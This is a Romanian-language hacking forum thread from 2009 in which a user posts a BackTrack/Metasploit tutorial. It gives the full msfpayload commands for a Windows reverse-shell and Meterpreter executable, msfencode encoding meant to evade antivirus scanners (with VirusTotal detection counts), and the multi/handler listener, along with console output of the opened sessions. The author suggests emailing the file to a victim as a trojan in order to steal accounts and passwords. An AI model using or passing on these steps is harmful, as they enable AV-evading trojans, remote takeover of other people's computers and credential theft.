neox Posted September 12, 2009 Report Posted September 12, 2009 video tutorial hackRapidShare: 1-CLICK Web hosting - Easy Filehostingaicia ii inca o data video http://www.fileshare.ro/1581041404.88 1 Quote
TigerSS Posted September 21, 2009 Report Posted September 21, 2009 Te rog si eu sal reuploadezi 10x!!! A fost foarte instructiv cel dinainte Quote
neox Posted September 22, 2009 Author Report Posted September 22, 2009 baieti spunetimi un host bun rominesc ca sa actualizez Backtrack-hack video ca o expirat de la rapide si am uitat ceva sa va arat ca eu fac asta la inceput in Backtrack4 dupa instalare ca sa ai succes cu Metasploit ca sa nu arate ca virus sau ca atack pe sistemul victima faceti asa Cu Metasploit, este posibil s? creze sarcinile utile, executabil de exemplu, s? ia o Reverse Shell atacator. Acesta este un fi?ier executabil exe . Între timp, scanere virusului sunt o parte de baz? al oric?rui sistem ?i, prin urmare, este important ca Payload sa nu fie cunoscut ca virus cum facem un Payload cu Reverse Shell? asa in backtrack 4 deschidem console si dam urmatarea comanda intre liniute ii todauna comanda -------------------------------------------------------------------------------------------/pentest/exploits/framework3/msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 X > payload.exe-------------------------------------------------------------------------------------------si in consola iti arata asa Created by msfpayload (http://www.metasploit.com).Payload: windows/shell/reverse_tcpLength: 278Options: LHOST=192.168.1.100 binenteles ca la ip trebuie dat ip vostru Pentru a codifica Payload urmeaz? s? fie elaborate astfel încât sa nu fie detecta ca virus pentru a trimite prin intermediul msfencode. Alege?i din acestea Encoder urm?toarele (respect? rank):dai conanda asta in aceiasi consola -------------------------------------------------------------------------------------------/pentest/exploits/framework3/msfencode -l-------------------------------------------------------------------------------------------si iti arata asa Framework Encoders==================Name Rank Description---- ---- -----------cmd/generic_sh normal Generic Shell Variable Substitution Command Encodergeneric/none normal The "none" Encodermipsbe/longxor normal XOR Encodermipsle/longxor normal XOR Encoderphp/base64 normal PHP Base64 encoderppc/longxor normal PPC LongXOR Encoderppc/longxor_tag normal PPC LongXOR Encodersparc/longxor_tag normal SPARC DWORD XOR Encoderx86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoderx86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoderx86/avoid_utf8_tolower manual Avoid UTF8/tolowerx86/call4_dword_xor normal Call+4 Dword XOR Encoderx86/countdown normal Single-byte XOR Countdown Encoderx86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoderx86/jmp_call_additive great Polymorphic Jump/Call XOR Additive Feedback Encoderx86/nonalpha low Non-Alpha Encoderx86/nonupper low Non-Upper Encoderx86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoderx86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoderx86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase EncoderAcum ne putem crea un Payload pentru compara?ie cu encoder x86/countdown ?i verificatile pe VirusTotal ?i apoi vom crea un Payload cu encoder x86/shikata_ga_nai ?i verifica?i-l, de asemenea.x86/countdown-Encoder:iara in aceiasi consola urmatoarea comanda asa ii o singura comanda de la un cap la altul-------------------------------------------------------------------------------------------/pentest/exploits/framework3/msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 R | /pentest/exploits/framework3/msfencode -e x86/countdown -c 4 -t exe -o payload-countdown.exe-------------------------------------------------------------------------------------------si iti arata asa in console[*] x86/countdown succeeded with size 297 (iteration=1)[*] x86/countdown succeeded with size 315 (iteration=2)[*] x86/countdown succeeded with size 333 (iteration=3)[*] x86/countdown succeeded with size 351 (iteration=4)la virustotal din 40 virusscaner il recunoaste 7 ca virus înc? .x86/shikata_ga_nai-Encoder:iara console dai comanda asta -------------------------------------------------------------------------------------------/pentest/exploits/framework3/msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 4 -t exe -o payload-shikata_ga_nai.exe-------------------------------------------------------------------------------------------asa iti arata in console [*] x86/shikata_ga_nai succeeded with size 306 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 333 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 360 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 387 (iteration=4)la virustotal il recunoaste numa 6 programe virus acuma Dup? diferitelor teste cu codificatoare diferite, num?r diferit de iterations, rata de succes a virusului întotdeauna 6 - 9 sint cunoscute (din 40 scanere) cel mai mult am reusit sa fie cunoscut numa de 2 programe de antivirus dar trebuie lucrat cu ollydbg si ii mult de lucru pe desktop o facut trei exe le poti testa sa vezi cum merg ori le trimiti prin e-mail sau il folosesti ca server trojan si il trimiti la victima dar poti testa si pe un host virtual Payload in Actionasa il chemi cu comanda asta console -------------------------------------------------------------------------------------------/pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=4444 O-------------------------------------------------------------------------------------------asa iti arata in console[*] Please wait while we load the module tree...Name Current Setting Required Description---- --------------- -------- -----------Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC seh yes Exit technique: seh, thread, processLHOST 192.168.1.100 yes The local addressLPORT 4444 yes The local port12:45:55 m1k3-offsec ~ [root]/pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=4444 E[*] Please wait while we load the module tree...[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Starting the payload handler...[*] Sending stage (474 bytes)[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.103:7636)Microsoft Windows XP [Version 5.1.2600]© Copyright 1985-2001 Microsoft Corp.E:\payload>de acia faceti ce vreti La fel de simplu ca se poate merge si au o cochilie tunel de la re?eaua intern? a atacator ?i el are acces la re?eaua intern? a victimei ! meterpreter Conectarea ?i asat ia toate aconturile si passiara in consola asa ala ce lai facut cu x86/shikata_ga_nai-Encoder:-------------------------------------------------------------------------------------------/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 3 -t exe -o test/payload-meterpreter-shikata_ga_nai-3encoding.exe-------------------------------------------------------------------------------------------si asa iti arat in console[*] x86/shikata_ga_nai succeeded with size 306 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 333 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 360 (iteration=3)12:52:13 m1k3-offsec ~ [root]/pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 E[*] Please wait while we load the module tree...[*] Handler binding to LHOST 0.0.0.0[*] Starting the payload handler...[*] Started reverse handler[*] Transmitting intermediate stager for over-sized stage...(191 bytes)[*] Sending stage (50 bytes)[*] Sleeping before handling stage...[*] Uploading DLL (87 bytes)...[*] Upload completed.[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.103:7673)meterpreter > help...acelasi lucru faci in framework3 asa cum am facut eu video backtrack-hack la voi intra payload standard in actiune si ala ii naspa deci navigezi in console bt asadeschizi o consola nou dai cd /pentest/exploits/framework3/si pe urma dai comenzile de mai sus pe care leam aratat numa comenzile cu encoder fara payload in actiune si pe urma aveti si voi payload bun fara ca sa faca probleme in pc vitima dar sa fiti atent la ip ce vil da backtrack exemplu tu ai ip 192.168.1.165 ai facut payload si pe urma merge citeva zile si bt schimba ip intra nu mai merge payload ala modificat ,merge payload ala standard deci sa fiti atent la ip ori faci cu encoder de cite ori schimba ip ori faci numa o data si iti schimbi tu ip inapoi scuze degramatica si scris cred ca scriu de o ora Quote
daatdraqq Posted September 22, 2009 Report Posted September 22, 2009 baieti spunetimi un host bun rominesc ca sa actualizez Backtrack-hack video ca o expirat de la rapide si am uitat ceva sa va arat File Share - Share your files!Video, Poze, Fisiere, Muzica :: Filebox.roDump - Unlimited file storage Quote
neox Posted September 23, 2009 Author Report Posted September 23, 2009 mersi daatdraqq daca ceva nu merge spuneti si rezolvam Quote
